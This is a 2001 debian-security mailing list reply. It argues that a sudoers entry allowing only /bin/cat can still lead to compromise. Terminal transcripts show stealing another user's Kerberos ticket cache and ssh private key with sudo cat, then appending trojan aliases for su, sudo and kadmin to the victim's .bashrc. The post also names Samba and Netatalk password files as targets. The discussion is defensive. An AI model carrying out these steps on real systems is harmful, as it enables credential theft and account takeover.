Re: shared root account

To: debian-security@lists.debian.org
Subject: Re: shared root account
From: Will Aoki <waoki@umnh.utah.edu>
Date: Sat, 7 Jul 2001 00:11:44 -0600
Message-id: <[🔎] 20010707001144.D12055@umnh.utah.edu>
Mail-followup-to: debian-security@lists.debian.org
In-reply-to: <[🔎] 87hewpy26m.fsf@dyn006239.shef.ac.uk>; from e.e.moore@shef.ac.uk on Sat, Jul 07, 2001 at 02:10:09AM +0100
References: <[🔎] B76B3592.2110%robert@sciresearch.com> <[🔎] 20010706094355.A25712@micromuse.com> <[🔎] 20010706152456.M26109@plato.local.lan> <[🔎] 87hewpy26m.fsf@dyn006239.shef.ac.uk>

On Sat, Jul 07, 2001 at 02:10:09AM +0100, Eric E Moore wrote:
[cut]
> I would be very shocked if you could compromise a system with a
> sudoers entry of:
> me hostname = (root) /bin/cat

Depends on what's on the system. I've thought of four similar ways.


1:

With Kerberos, you can steal someone's ticket-granting ticket and use it
until it expires. My example also uses AFS:

| test@pentagram:~$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: test@G6NET.COM
| 
| Valid starting     Expires            Service principal
| 07/06/01 22:29:11  07/07/01 08:29:11  host/pentagram.g6net.com@G6NET.COM
| 07/06/01 22:29:11  07/07/01 08:29:11  krbtgt/G6NET.COM@G6NET.COM
| 07/06/01 22:29:11  07/07/01 08:29:11  afs/g6net.com@G6NET.COM
| 
| 
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| test@pentagram:~$ cd /tmp
| test@pentagram:/tmp$ ls -al
| total 20
| drwxrwxrwt    3 root     root         1024 Jul  6 22:29 .
| drwxr-xr-x   21 root     root         1024 Jun 27 23:41 ..
| -rw-------    1 waoki    waoki         892 Jul  6 01:40 krb5cc_1002
| -rw-------    1 waoki    waoki         848 Jul  6 22:22 krb5cc_GMJQN9
| -rw-------    1 test     test          885 Jul  6 22:28 krb5cc_SyJR0W
| -rw-------    1 test     test          885 Jul  6 22:26 krb5cc_YzLI0R
| -rw-------    1 test     test         1243 Jul  6 22:29 krb5cc_q5bOCp
| drwxr-xr-x    2 root     root        12288 Nov 14  2000 lost+found
| test@pentagram:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| ls: /afs/g6net.com/user/waoki/secure: Permission denied
| test@pentagram:/afs/g6net.com/user/waoki$ touch /afs/g6net.com/user/waoki/afile
| touch: creating `/afs/g6net.com/user/waoki/afile': Permission denied

Nope, can't access someone else's homedir...

| test@pentagram:/tmp$ sudo -v
| 
| We trust you have received the usual lecture from the local System
| Administrator. It usually boils down to these two things:
| 
|         #1) Respect the privacy of others.
|         #2) Think before you type.
| 
| Password for test@G6NET.COM: 

Now we steal a TGT (but we could also go after the keytab)...

| test@pentagram:/tmp$ sudo /bin/cat krb5cc_GMJQN9 > krb5cc_q5bOCp 
| test@pentagram:/tmp$ aklog

...and now I'm someone else!

| test@pentagram:/tmp$ klist
| Ticket cache: FILE:/tmp/krb5cc_q5bOCp
| Default principal: waoki@G6NET.COM
| 
| Valid starting     Expires            Service principal
| 07/06/01 22:21:56  07/07/01 08:21:52  krbtgt/G6NET.COM@G6NET.COM
| 07/06/01 22:22:03  07/07/01 08:21:52  afs/g6net.com@G6NET.COM
| 
| 
| Kerberos 4 ticket cache: /tmp/tkt1001
| klist: You have no tickets cached
| 
| test@pentagram:/tmp$ ls -al /afs/g6net.com/user/waoki/secure
| total 4
| drwxr-xr-x    2 waoki    waoki        2048 Jul  6 01:39 .
| drwxr-xr-x    5 waoki    waoki        2048 Jul  6 22:33 ..
| -rw-r--r--    1 waoki    waoki           0 Jul  6 01:39 file

(As an aside, although the 'secure' directory above is mode 755, it's
on AFS, so the Unix mode bits don't apply.)

Now let's set up some trojans:

| test@pentagram:/tmp$ cp ~/.su.trojan ~/.sudo.trojan ~/.kadmin.trojan /afs/g6net.com/user/waoki/
| test@pentagram:/tmp$ echo alias su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /bin/su=~/.su.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /usr/bin/sudo=~/.sudo.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$ echo alias /usr/sbin/kadmin=~/.kadmin.trojan >> /afs/g6net.com/user/waoki/.bashrc
| test@pentagram:/tmp$


2:

Something similar could be done if someone's ssh identity or id_dsa keys
aren't password protected:

| [test@tertia test]$ sudo cat /home/waoki/.ssh/id_dsa > .ssh/id_dsa
| [test@tertia test]$ ssh localhost -l waoki

and now I can trojan apps, or (since the default Debian sudo uses one
timestamp file per user, instead of one per user per tty) I can wait
for the victim to sudo, and then sudo without entering his password.


3 and 4:

If the system's running Samba, access to /etc/smbpasswd lets me log in
to Samba as anyone who appears in /etc/smbpasswd. If the system is using
Netatalk with randnum authentication, users' AppleTalk passwords will
be stored in plaintext in ~/.passwd. Once again, I can trojan binaries
and scripts.


Oh, and catting /proc/kcore could yield interesting information.

-- 
William Aoki                waoki@umnh.utah.edu           (801)-(58)5-1924
UMNH Computer Support          Room 001, GTB              (801)-(58)1-6928
1390 E President's Circle   Salt Lake City, Utah                84112-0050
Key 199D8C7B Fingerprint 3B0A 6800 8A1A 78A7 9A26 BB92 6329 2D3E 199D 8C7B

Reply to:

Follow-Ups:
- Re: shared root account
  - From: scbarker@uiuc.edu (Steven Barker)

References:
- Re: shared root account
  - From: "Robert L. Yelvington" <robert@sciresearch.com>
- Re: shared root account
  - From: Nathan E Norman <nnorman@micromuse.com>
- Re: shared root account
  - From: Ethan Benson <erbenson@alaska.net>
- Re: shared root account
  - From: Eric E Moore <e.e.moore@shef.ac.uk>

Prev by Date: Re: shared root account
Next by Date: Re: shared root account
Previous by thread: Re: shared root account
Next by thread: Re: shared root account
Index(es):
- Date
- Thread